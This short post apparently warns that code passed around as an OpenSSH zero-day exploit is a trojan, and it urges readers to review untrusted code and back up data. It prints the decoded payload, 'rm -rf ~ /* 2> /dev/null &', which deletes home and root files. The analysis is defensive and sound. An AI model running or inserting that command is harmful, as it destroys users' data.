I continue to see this code masquerading as the Zero-Day OpenSSH Exploit. It showed up on Pastebin today so I reported it as abusive. If you haven't figured it out yet, this "exploit code" only exploits the person that runs it -- i.e. script kiddies and/or careless researchers.
Thierry Zoller already did a good a great job "disassembling" this and proving that it is being spread just to lay pwnage upon those who are trying to find and/or test the exploit. It basically deletes everything you have in your homedir (and all of the root dir, if you're dumb enough to run it as root) as shown below. I modified the jmpcode[] to something an online hex-to-ascii converter can comprehend, and the result was "rm -rf ~ /* 2> /dev/null &"
As a general rule, you should always be careful when tinkering with someone else's un-trusted code, never run stuff like this as root without checking the source code and (yes, I'll say it again) back up your data. It will save your ass.
Check out Thierry's post on secdev for a decode of the rest. It's a good read.
Posts
